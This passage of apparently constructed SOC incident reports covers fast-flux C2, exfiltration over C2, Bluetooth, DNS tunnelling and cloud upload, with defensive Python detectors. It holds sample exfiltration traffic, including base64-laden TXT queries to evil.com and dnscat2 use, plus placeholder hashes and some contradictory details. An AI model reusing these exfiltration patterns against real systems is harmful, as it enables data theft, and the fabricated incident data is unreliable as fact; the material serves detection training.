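           "198.51.100.10": "US", "198.51.100.11": "US", "198.51.100.12": "US"}
# Constructed WHOIS-style creation dates.
REGISTERED = {"cdn-update-service.com": date(2024, 2, 28),
              "cdn.example-vendor.net": date(2015, 6, 1)}


def fast_flux_score(answers, as_of=date(2024, 3, 1)):
    """Return {qname: (score, evidence)} with one point per tripped signal."""
    per_domain = defaultdict(lambda: {"ips": set(), "ttls": [], "clients": set()})
    for _ts, qname, ip, ttl, client in answers:
        d = per_domain[qname]
        d["ips"].add(ip)
        d["ttls"].append(ttl)
        d["clients"].add(client)

    results = {}
    for qname, d in per_domain.items():
        evidence = []
        countries = {COUNTRY.get(ip, "??") for ip in d["ips"]}
        if len(d["ips"]) >= 4:
            evidence.append(f"{len(d['ips'])} distinct answer IPs")
        if len(countries) >= 3:
            evidence.append(f"IPs spread over {len(countries)} countries")
        if max(d["ttls"]) <= 300:
            evidence.append("TTL <= 300s")
        age_days = (as_of - REGISTERED[qname]).days if qname in REGISTERED else None
        if age_days is not None and age_days <= 7:
            evidence.append(f"registered {age_days} days ago")
        if len(d["clients"]) >= 3:
            evidence.append(f"queried by {len(d['clients'])} internal hosts")
        results[qname] = (len(evidence), evidence)
    return results


def flux_alerts(answers, alert_at=3):
    """Domains whose score reaches the alert threshold, sorted by name."""
    return sorted(q for q, (s, _) in fast_flux_score(answers).items() if s >= alert_at)


if __name__ == "__main__":
    for qname, (score, why) in fast_flux_score(SAMPLE_ANSWERS).items():
        print(qname, score, why)
```

In production the GeoIP and WHOIS lookups are external calls and the answer records come from the resolver or Umbrella logs; the scoring itself stays the same, and the evidence list is what the analyst needs at step 1 (alert validation).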
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Umbrella alert
Cisco Umbrella Dashboard
Confirmed fast-flux domain with multiple internal queries
2. Host Investigation
Identify hosts querying domain
CrowdStrike Falcon
12 hosts with Cobalt Strike beacons
3. Malware Analysis
Extract beacon samples
CrowdStrike Sandbox
QakBot malware using fast-flux C2
4. Immediate Action
Isolate all affected hosts
CrowdStrike
12 hosts quarantined
5. C2 Blocking
Block domain and IPs
Umbrella, Palo Alto
Domain and all associated IPs blocked
6. Malware Removal
Clean all affected hosts
CrowdStrike Live Response
Beacons removed; hosts reimaged
Jira Incident Report
Ticket: SOC-2024-154
Summary: T1568 – Fast-Flux C2 Domain Affecting 12 Hosts
Status: RESOLVED
Resolution: MALICIOUS – C2 Disrupted, Hosts Cleaned
Priority: P1 – CRITICAL
Labels: T1568, dynamic-resolution, fast-flux, qakbot, cisco-umbrella, widespread
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Investigate.
Alert: “Fast-Flux DNS – Malware C2 Detection”.
Domain: cdn-update-service[.]com.
Queries: 47 queries from 12 internal hosts.
Time: 2024-03-01 16:30 EST.
Technique: MITRE ATT&CK T1568.001 – Dynamic Resolution: Fast Flux DNS.
2. Technical Analysis:
Fast-Flux Details:
Domain: cdn-update-service[.]com (registered 2024-02-28)
IPs: 6 different IPs across 5 countries
TTL: 300 seconds (5 minutes)
Flux Rate: IP changes every 5-10 minutes
Affected Hosts (12):
Engineering: 3 hosts (ENG-WS-045, 046, 047)
Finance: 2 hosts (FIN-WS-078, 079)
HR: 2 hosts (HR-WS-023, 024)
Marketing: 2 hosts (MKT-WS-112, 113)
Sales: 3 hosts (SALES-WS-023, 024, 025)
Malware Analysis:
Type: QakBot banking trojan
C2: cdn-update-service[.]com
Beacon Interval: 5 minutes
Capabilities: Credential theft, keylogging, remote access
Common Infection Vector:
All 12 users clicked phishing email with same attachment
Email subject: “Invoice Overdue”
Attachment: invoice_7842.docm (macro-enabled)
3. Investigation Findings:
Timeline:
09:00 – Phishing emails sent
09:15-10:00 – Users clicked attachments
10:00-16:00 – Beacons active, fast-flux DNS
16:30 – Umbrella alert
16:32 – SOC investigates
16:35 – All 12 hosts identified
16:40 – Hosts isolated
16:45 – Domain blocked
Indicators of Compromise (IoCs):
Domain:
– cdn-update-service[.]com (blocked)
IPs:
– 185.143.221.89, 194.165.16.78, 203.0.113.45, 45.134.225.12, 89.248.165.67
File:
– invoice_7842.docm (SHA256: a1b2c3d4…)
Hosts:
– 12 compromised workstations (list attached)
4. Containment Actions:
Immediate Actions:
Isolated all 12 affected hosts via CrowdStrike.
Blocked domain and all associated IPs at firewall and Umbrella.
Terminated beacon processes on all hosts.
Host Remediation:
All 12 hosts reimaged.
User passwords reset.
MFA enforced for all.
Email Remediation:
Quarantined phishing email from all mailboxes.
Blocked sender domain.
5. Root Cause Analysis:
Primary Cause: Widespread phishing campaign with macro-enabled documents.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
Users lacked recent training.
6. Business Impact:
Operational Impact: 12 workstations offline for 4 hours.
Data Exposure: Potential credential theft; investigation ongoing.
Productivity Impact: Significant across multiple departments.
7. Remediation & Prevention:
Completed Actions:
C2 disrupted.
12 hosts cleaned.
Passwords reset.
MFA enforced.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced email filtering for invoice-themed emails.
Deployed additional security awareness training.
8. Conclusion:
A widespread phishing campaign infected 12 hosts with QakBot malware using fast-flux DNS to evade IP blocking. Cisco Umbrella detected the fast-flux pattern and enabled rapid identification and isolation of all affected hosts before significant data loss.
Closure Rationale: C2 disrupted; all hosts cleaned; passwords reset.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-01 17:30 EST
115. T1041 – Exfiltration Over C2 Channel (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXFIL-C2-1041-7842
Alert Time: 2024-03-01 10:30:22 EST
Severity: CRITICAL (95/100)
Source: Palo Alto Networks Firewall + WildFire
Rule: “Data Exfiltration Detected over Established C2 Channel”
MITRE ATT&CK: T1041 – Exfiltration Over C2 Channel
Alert Details:
Detection: Large data transfer over previously established C2 connection
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:443
Time: 10:15-10:30 EST
Connection History:
09:00: First C2 beacon (established)
09:00-10:15: Periodic beacons (every 5 minutes, <1KB each)
10:15-10:30: Large data transfer (47 MB in 15 minutes)
Traffic Analysis:
09:00:15 – POST /beacon (124 bytes) – C2 check-in
09:05:22 – POST /beacon (118 bytes) – C2 check-in
09:10:18 – POST /beacon (132 bytes) – C2 check-in
…
10:15:33 – POST /upload (12.3 MB) – data exfiltration
10:20:47 – POST /upload (11.8 MB) – data exfiltration
10:25:52 – POST /upload (12.1 MB) – data exfiltration
10:28:15 – POST /upload (10.8 MB) – data exfiltration
Data Analysis (WildFire sandbox):
Files exfiltrated: source code archives, design documents
Total: 47 MB in 4 uploads
Encrypted with C2 session key
Detection Logic:
Baseline C2 traffic: small beacons (<1KB)
Anomaly: 47 MB transfer in 15 minutes
Same destination IP as C2
Pattern matches exfiltration over existing C2 channel
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Palo Alto alert
Panorama Logs
Confirmed exfiltration over C2 channel
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
Cobalt Strike beacon exfiltrating data
3. Data Analysis
Determine what was stolen
File Audit Logs, EDR
47 MB of source code and designs exfiltrated
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Incident Response
Activate breach response
Legal, PR, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-155
Summary: T1041 – 47 MB of Intellectual Property Exfiltrated Over C2 Channel
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1041, exfiltration, c2-channel, cobalt-strike, palo-alto, data-breach
Components: Network-Security, Data-Protection, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall + WildFire.
Alert: “Data Exfiltration Detected over Established C2 Channel”.
Source: ENG-WS-045 (Engineering, user alexchen).
Destination: 185.143.221[.]89:443.
Data: 47 MB exfiltrated.
Time: 2024-03-01 10:30 EST.
Technique: MITRE ATT&CK T1041 – Exfiltration Over C2 Channel.
2. Technical Analysis:
Attack Chain:
08:30 – alexchen account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Cobalt Strike beacon deployed
09:00-10:15 – Beaconing (small traffic)
10:00 – Attacker collects sensitive files
10:15-10:30 – Data exfiltration
10:30 – Palo Alto detects
Exfiltrated Data (47 MB):
Source Code: ProjectX (12 MB) – proprietary algorithms
Design Documents: CAD files (15 MB) – product designs
Customer Data: CSV files (8 MB) – PII
Financial Reports: Q4 projections (5 MB)
VPN Configurations: (2 MB) – network access
Password Database: KeePass (5 MB) – all corporate passwords
Exfiltration Method:
C2 Channel: HTTPS POST to same C2 used for beacons
Encryption: Session key from C2 handshake
Chunking: Data split into 4 uploads (10-12 MB each)
Timing: 15 minutes total
Attacker Activity:
Collected data from multiple locations
Created archives before exfiltration
Used existing C2 channel to avoid new connections
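The exfiltration method above (re-using the beacon's destination and session so no new connection appears) is exactly why the firewall rule keys on the per-destination byte baseline rather than on new destinations. The routine below is an added example, not the firewall's or the report's own logic: it takes constructed flow records (the field layout stands in for a firewall or Zeek conn log and is an assumption, as are the thresholds), establishes that a destination has a history of sub-kilobyte requests, and alerts when the same pair then moves tens of megabytes inside a short window.

```python
"""Detect bulk uploads riding an already-established beacon channel
(added example; records and thresholds are constructed assumptions)."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Constructed: (time, src_host, dst_ip, dst_port, bytes_sent)
SAMPLE_FLOWS = [
    ("2024-03-01T09:00:15", "ENG-WS-045", "185.143.221.89", 443, 124),
    ("2024-03-01T09:05:22", "ENG-WS-045", "185.143.221.89", 443, 118),
    ("2024-03-01T09:10:18", "ENG-WS-045", "185.143.221.89", 443, 132),
    ("2024-03-01T09:15:20", "ENG-WS-045", "185.143.221.89", 443, 121),
    ("2024-03-01T09:20:19", "ENG-WS-045", "185.143.221.89", 443, 127),
    ("2024-03-01T10:15:33", "ENG-WS-045", "185.143.221.89", 443, 12_300_000),
    ("2024-03-01T10:20:47", "ENG-WS-045", "185.143.221.89", 443, 11_800_000),
    ("2024-03-01T10:25:52", "ENG-WS-045", "185.143.221.89", 443, 12_100_000),
    ("2024-03-01T10:28:15", "ENG-WS-045", "185.143.221.89", 443, 10_800_000),
    # Benign: a backup agent only ever sends large uploads, so it has no
    # beacon baseline and is left to a separate bulk-transfer rule.
    ("2024-03-01T09:30:00", "FIN-WS-078", "203.0.113.200", 443, 50_000_000),
    ("2024-03-01T10:30:00", "FIN-WS-078", "203.0.113.200", 443, 52_000_000),
]


def exfil_over_c2(flows, min_beacons=4, max_beacon_bytes=1024,
                  window=timedelta(minutes=15), burst_bytes=10_000_000):
    """Alert on (src, dst, port) pairs with a run of small requests (the beacon
    baseline) followed by >= burst_bytes sent within `window`."""
    pairs = defaultdict(list)
    for ts, src, dst, port, sent in flows:
        pairs[(src, dst, port)].append((datetime.fromisoformat(ts), sent))

    alerts = []
    for (src, dst, port), recs in pairs.items():
        recs.sort()
        small = [b for _, b in recs if b <= max_beacon_bytes]
        if len(small) < min_beacons:
            continue  # no beacon baseline: not this rule's pattern
        big = [(t, b) for t, b in recs if b > max_beacon_bytes]
        # Slide a window over the large requests only; the first window that
        # reaches the burst threshold is the exfiltration start.
        for i, (t0, _) in enumerate(big):
            in_win = [b for t, b in big[i:] if t - t0 <= window]
            total = sum(in_win)
            if total >= burst_bytes:
                alerts.append({"src": src, "dst": f"{dst}:{port}",
                               "baseline_median_bytes": int(median(small)),
                               "burst_bytes": total, "burst_uploads": len(in_win),
                               "burst_start": t0.isoformat()})
                break  # one alert per pair is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in exfil_over_c2(SAMPLE_FLOWS):
        print(alert)
```

The baseline is computed per destination pair, not per host, which is what lets the rule fire on a destination the beacon has quietly used for hours; the same window logic run only on the small requests (checking their regular spacing) would catch the beaconing phase earlier, before any data leaves.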
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Beacon deployed
09:00-10:15 – Beaconing
10:00-10:15 – Data collection
10:15-10:30 – Exfiltration
10:30 – Palo Alto alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– C2: 185.143.221[.]89:443
– Beacon pattern: small traffic then large uploads
Data:
– 47 MB exfiltrated (source code, designs, customer data, passwords)
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 IP at firewall.
Terminated beacon process.
Disabled alexchen account.
Reset password.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (for PII exposure).
Rotated all passwords (corporate-wide).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
C2 channel established undetected for 2 hours before exfiltration.
6. Business Impact:
Operational Impact: Engineering host offline; password reset for all users.
Data Exposure: 47 MB of IP, PII, and credentials exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Breach response initiated.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP for egress traffic.
Enhanced monitoring for traffic anomalies (beaconing + large transfers).
8. Conclusion:
An attacker compromised an engineering account and used an established C2 channel to exfiltrate 47 MB of intellectual property, customer data, and corporate passwords. Palo Alto detected the anomalous traffic pattern, but exfiltration had already occurred. A full data breach response was initiated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-01 11:30 EST
End of Batch 23
Batch 24: Exfiltration Incident Reports
116. T1011 – Exfiltration Over Bluetooth (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-BLUETOOTH-EXFIL-1011-7842
Alert Time: 2024-03-02 09:30:15 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Bluetooth File Transfer Detected – Potential Data Exfiltration”
MITRE ATT&CK: T1011 – Exfiltration Over Other Network Medium: Bluetooth
Alert Details:
Detection: Large file transfer over Bluetooth from corporate laptop
Host: RND-WS-045 (Research & Development)
User: alexchen@company.com (Alex Chen, Researcher)
Time: 09:15-09:30 EST
Bluetooth Activity:
Device Paired: “iPhone 14 Pro” (attacker’s device)
Pairing Time: 09:10 EST
File Transfer Start: 09:15 EST
Files Transferred: 47 files
Total Size: 234 MB
File Types: .py, .ipynb, .docx, .pdf, .kdbx
File Transfer Log (CrowdStrike):
09:15:22 – quantum_algorithm.py (2.3 MB) transferred to iPhone
09:16:45 – research_data.ipynb (4.5 MB) transferred
09:18:12 – model_weights.h5 (15.2 MB) transferred
09:20:05 – patent_draft.docx (1.2 MB) transferred
09:22:33 – customer_list.xlsx (3.4 MB) transferred
09:24:18 – source_code_backup.zip (45.6 MB) transferred
09:26:45 – passwords.kdbx (1.8 MB) transferred
… (47 total transfers)
Detection Logic:
Bluetooth file transfer (unusual for this user)
Large volume of data (234 MB)
Files include source code, research data, password database
User has no history of Bluetooth transfers
Pattern matches data exfiltration via Bluetooth
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed Bluetooth file transfer activity
2. User Interview
Contact alexchen
Teams, Phone
User did NOT transfer files via Bluetooth (account compromised)
3. Physical Security
Check badge access
Security Logs
Unauthorized individual in R&D area at 09:00
4. Immediate Action
Isolate host
CrowdStrike
RND-WS-045 quarantined
5. Account Remediation
Disable alexchen account
Azure AD, AD
Account disabled; password reset
6. Incident Response
Activate breach response
Legal, Management
Data breach declared
Jira Incident Report
Ticket: SOC-2024-156
Summary: T1011 – 234 MB of R&D Data Exfiltrated via Bluetooth
Status: RESOLVED
Resolution: MALICIOUS – Data Breach Confirmed
Priority: P1 – CRITICAL
Labels: T1011, bluetooth-exfiltration, data-breach, crowdstrike, physical-access
Components: Endpoint-Security, Physical-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Bluetooth File Transfer Detected – Potential Data Exfiltration”.
Host: RND-WS-045 (R&D Department, user alexchen).
Method: Bluetooth file transfer to “iPhone 14 Pro”.
Data: 47 files, 234 MB.
Time: 2024-03-02 09:30 EST.
Technique: MITRE ATT&CK T1011 – Exfiltration Over Other Network Medium: Bluetooth.
2. Technical Analysis:
Attack Chain:
08:45 – Unauthorized individual enters R&D area (piggybacked)
08:50 – Individual sits at alexchen’s desk (user at coffee break)
08:55 – Attacker logs into unlocked workstation
09:00 – Attacker pairs iPhone via Bluetooth
09:05 – Attacker navigates to sensitive folders
09:15-09:30 – Attacker transfers 47 files (234 MB)
09:30 – Attacker leaves; CrowdStrike alerts
09:31 – SOC investigates
Files Exfiltrated:
Source Code: quantum_algorithm.py, model_weights.h5, source_code_backup.zip (63 MB)
Research Data: research_data.ipynb, experiment_results.csv (28 MB)
Patents: patent_draft.docx, patent_figures.pdf (12 MB)
Customer Data: customer_list.xlsx, client_contracts.pdf (15 MB)
Passwords: passwords.kdbx (corporate password vault – 1.8 MB)
Other: Various documents, spreadsheets (114 MB)
Physical Security Breach:
Attacker entered via badge tailgating (no badge scan)
Workstation was unlocked (user left for coffee)
No security in R&D area
User Status:
User was on coffee break, unaware
Account not compromised (physical access only)
3. Investigation Findings:
Timeline:
08:45 – Attacker enters building
08:50 – Attacker at workstation
09:00-09:30 – Bluetooth pairing and file transfer
09:30 – CrowdStrike alert
09:31 – SOC investigates
09:32 – Security dispatched
09:35 – Attacker fled (not found)
09:36 – Host isolated
Indicators of Compromise (IoCs):
Physical:
– Unauthorized individual, male, 30s, dark hoodie
– Entered at 08:45 via badge tailgating
Device:
– “iPhone 14 Pro” (attacker’s device)
– Bluetooth pairing at 09:00
Files:
– 47 files, 234 MB exfiltrated (list attached)
4. Containment Actions:
Immediate Actions:
Isolated RND-WS-045 via CrowdStrike.
Disabled Bluetooth on all corporate workstations (policy push).
Reset alexchen password (precaution).
Security increased in R&D area.
Breach Response:
Declared data breach.
Notified legal, PR, management.
Began customer notification process (PII exposure).
Rotated all corporate passwords (password vault compromised).
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: Physical security breach (tailgating) + unlocked workstation.
Contributing Factors:
No mantraps at entrances.
Workstation left unlocked.
Bluetooth enabled and allowed for file transfers.
No security cameras covering R&D area.
6. Business Impact:
Operational Impact: R&D workstation offline; password reset for all users.
Data Exposure: 234 MB of IP, source code, customer data, passwords exfiltrated.
Regulatory Impact: GDPR/CCPA breach (customer PII).
Financial Impact: Significant (IP theft, incident response, notification, potential fines).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Bluetooth disabled.
Passwords rotated.
Breach response initiated.
Technical Controls Enhanced:
Disabled Bluetooth file transfer via GPO.
Enforced screen lock after 5 minutes.
Implemented mantraps at all entrances.
Added security cameras in sensitive areas.
Deployed USB/Bluetooth device control.
8. Conclusion:
An attacker gained physical access to an unlocked R&D workstation and exfiltrated 234 MB of intellectual property, customer data, and corporate passwords via Bluetooth. CrowdStrike detected the Bluetooth file transfer, but exfiltration had already occurred. A full data breach response was initiated, and all corporate passwords were rotated.
Closure Rationale: Data exfiltrated; exfiltration stopped; breach response initiated; all passwords rotated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 10:30 EST
117. T1048 – Exfiltration Over Alternative Protocol (Zeek Detection)
Zeek Alert Details
Alert ID: ZEEK-EXFIL-ALT-PROTO-1048-7842
Alert Time: 2024-03-02 14:15:33 EST
Severity: HIGH (88/100)
Source: Zeek Network Security Monitor
Rule: “Large Data Transfer over DNS – Potential DNS Tunneling”
MITRE ATT&CK: T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Alert Details:
Detection: Large volume of DNS queries with encoded data – DNS tunneling
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
DNS Server: 8.8.8.8 (Google DNS)
Time: 14:00-14:15 EST
DNS Query Pattern:
14:00:15 – TXT query for a1b2c3d4e5f6.evil.com (response: 124 bytes)
14:00:22 – TXT query for g7h8i9j0k1l2.evil.com (response: 118 bytes)
14:00:28 – TXT query for m3n4o5p6q7r8.evil.com (response: 132 bytes)
… (continuing every 5-10 seconds)
Query Analysis:
Domain: *.evil.com (registered 2024-02-28)
Query Type: TXT (returns text data)
Subdomain lengths: 12-16 characters (random)
Response sizes: 100-150 bytes each
Total queries: 847 in 15 minutes
Total data transferred: ~98 KB (exfiltrated data)
Decoded Data Sample (base64 in subdomains):
Subdomain: a1b2c3d4e5f6
Decoded: “UEsDBBQAAAAIAICIF1Yj…” (base64 of a ZIP local file header; the leading “UEsDBBQA” decodes to the bytes PK\x03\x04\x14\x00)
Detection Logic:
847 DNS queries in 15 minutes (highly anomalous)
TXT queries with random subdomains (DNS tunneling pattern)
Destination domain suspicious (newly registered)
Response sizes consistent with encoded data
Pattern matches DNS tunneling exfiltration
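The five detection points above translate into per-(source, domain) features over the dns.log: query volume, the share of TXT queries, how many first labels are unique, how long they are, and how random they look. The detector below is an added example, not Zeek's or the report's own code: it works over constructed dns.log-style rows (the field layout and thresholds are assumptions) and, for a flagged pair, re-joins the labels in query order and checks the magic bytes, which is the defender-side version of the analysis step that produced the "ZIP header" finding. The carried payload in the sample is a constructed ZIP local file header so the reassembly can be verified offline.

```python
"""Flag DNS tunnelling from Zeek-style dns.log rows and identify what the
labels carry (added example; sample rows, payload and thresholds are constructed)."""
import base64
import math
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed payload: ZIP local-file header, an entry name, some compressed-
# looking bytes. Encoded base64url and split into 12-character labels.
PAYLOAD = (b"PK\x03\x04\x14\x00\x08\x08\x08\x00" + b"q4_report.csv"
           + bytes.fromhex("9ca13e71440fe25b770ad3966128be5a07c9f4832d6eb5194cfa80e736d1"))
ENCODED = base64.urlsafe_b64encode(PAYLOAD).rstrip(b"=").decode()
CHUNKS = [ENCODED[i:i + 12] for i in range(0, len(ENCODED), 12)]
T0 = datetime.fromisoformat("2024-03-02T14:00:15")

# Constructed dns.log rows: (ts, src_host, qtype, qname)
SAMPLE_DNS = [(T0 + timedelta(seconds=7 * i), "ENG-WS-045", "TXT", f"{c}.evil.com")
              for i, c in enumerate(CHUNKS)]
SAMPLE_DNS += [
    (T0 + timedelta(seconds=3), "FIN-WS-078", "A", "www.company.com"),
    (T0 + timedelta(seconds=40), "FIN-WS-078", "A", "mail.company.com"),
    (T0 + timedelta(seconds=50), "ENG-WS-045", "A", "cdn.example-vendor.net"),
]

MAGIC = {b"PK\x03\x04": "zip", b"%PDF": "pdf", b"\x1f\x8b": "gzip", b"\xd0\xcf\x11\xe0": "ole2"}


def registered_domain(qname):
    """Naive eTLD+1 (last two labels); use a public-suffix list in production."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def shannon_entropy(s):
    """Bits per character; 'www' is 0, a base64 label is usually above 3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def identify_payload(labels):
    """Re-join labels in query order, undo base64url and look at the magic bytes."""
    blob = "".join(labels)
    try:
        data = base64.urlsafe_b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:
        return "undecodable"
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def dns_tunnel_candidates(rows, min_queries=5, min_score=4):
    """Return {(src, domain): report} for pairs whose queries look like carried data."""
    groups = defaultdict(list)
    for ts, src, qtype, qname in rows:
        groups[(src, registered_domain(qname))].append((ts, qtype, qname))
    out = {}
    for key, recs in groups.items():
        recs.sort()
        labels = [q.split(".")[0] for _, _, q in recs]
        n = len(recs)
        signals = {
            "volume": n >= min_queries,
            "txt_heavy": sum(1 for _, t, _ in recs if t == "TXT") / n >= 0.8,
            "unique_labels": len(set(labels)) / n >= 0.9,
            "long_labels": sum(map(len, labels)) / n >= 10,
            "high_entropy": sum(map(shannon_entropy, labels)) / n >= 2.5,
        }
        score = sum(signals.values())
        if score >= min_score:
            out[key] = {"queries": n, "score": score, "signals": signals,
                        "carried": identify_payload(labels)}
    return out


if __name__ == "__main__":
    for key, report in dns_tunnel_candidates(SAMPLE_DNS).items():
        print(key, report)
```

On real traffic the volume signal should be a rate (the report's 847 queries in 15 minutes) rather than a count, and tools that tunnel over DNS pick a label alphabet that survives resolvers, so the decoder may need base32 or hex alongside base64url; the scoring and reassembly steps do not change.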
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zeek alert
Zeek Logs, Splunk
Confirmed DNS tunneling activity
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
dnscat2.exe (DNS tunneling tool) running
3. Data Analysis
Decode DNS queries
Base64 decoder
Exfiltrated data: ZIP files with documents
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. DNS Blocking
Block evil.com domain
Cisco Umbrella, Palo Alto
Domain blocked
6. Malware Removal
Clean infected host
CrowdStrike Live Response
dnscat2.exe removed; host reimaged
Jira Incident Report
Ticket: SOC-2024-157
Summary: T1048 – DNS Tunneling Exfiltration of 98 KB Data
Status: RESOLVED
Resolution: MALICIOUS – Exfiltration Detected, Host Cleaned
Priority: P2 – MEDIUM
Labels: T1048, alternative-protocol, dns-tunneling, exfiltration, zeek, dnscat2
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Large Data Transfer over DNS – Potential DNS Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Method: DNS tunneling via TXT queries.
Data: ~98 KB exfiltrated.
Time: 2024-03-02 14:15 EST.
Technique: MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.
2. Technical Analysis:
Attack Chain:
13:30 – rpatel account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker downloads dnscat2.exe (DNS tunneling tool)
13:55 – Attacker collects sensitive files (ZIP archives)
14:00-14:15 – Exfiltration via DNS tunneling
14:15 – Zeek detects
DNS Tunneling Tool:
Name: dnscat2.exe
SHA256: a1b2c3d4e5f6…
Mechanism: Encodes data in DNS queries (subdomains)
Protocol: DNS over UDP port 53
Server: evil.com (attacker-controlled DNS server)
Exfiltrated Data (98 KB):
Financial reports (2 files) – 45 KB
Customer list (1 file) – 28 KB
Source code snippets (3 files) – 25 KB
Total: 6 files, 98 KB
DNS Query Analysis:
Total Queries: 847 in 15 minutes
Data per Query: ~100-150 bytes
Total Data: ~98 KB
Domain: evil.com (now blocked)
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:50 – dnscat2.exe downloaded
13:55 – Data collection
14:00-14:15 – Exfiltration
14:15 – Zeek alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Domain blocked
Indicators of Compromise (IoCs):
Network:
– Domain: evil.com (blocked)
– DNS pattern: 847 TXT queries in 15 minutes
File:
– C:\Windows\Temp\dnscat2.exe (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked evil.com domain at firewall and DNS.
Terminated dnscat2.exe process.
Deleted dnscat2.exe.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (98 KB, 6 files).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DNS allowed to external resolvers (8.8.8.8).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 98 KB of sensitive data exfiltrated (financial, customer, source code).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted DNS to corporate resolvers only (block external DNS).
Enhanced Zeek monitoring for DNS tunneling.
8. Conclusion:
An attacker used DNS tunneling to exfiltrate 98 KB of sensitive data, evading detection by using a non-standard protocol. Zeek detected the anomalous DNS query pattern and enabled rapid containment, though exfiltration had already occurred.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-02 15:30 EST
118. T1567 – Exfiltration Over Web Service (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-WEB-EXFIL-1567-7842
Alert Time: 2024-03-02 11:30:22 EST
Severity: HIGH (85/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Large Upload to Cloud Storage – Potential Data Exfiltration”
MITRE ATT&CK: T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Alert Details:
Detection: Large file upload to Google Drive from internal user
User: kwilson@company.com (Karen Wilson, Finance)
Source IP: 192.168.45.112 (FIN-WS-078)
Destination: https://www.googleapis.com/upload/drive/v3/files
Time: 11:15-11:30 EST
Upload Details:
File: “Q4_Financial_Projections.xlsx” (12.3 MB)
File: “Customer_PII_Export.csv” (8.7 MB)
File: “Board_Meeting_Minutes.docx” (2.4 MB)
File: “Merger_Agreement_Draft.pdf” (5.6 MB)
File: “password.kdbx” (1.8 MB)
Total: 30.8 MB uploaded
Upload Pattern:
11:15:22 – Authentication to Google Drive (OAuth)
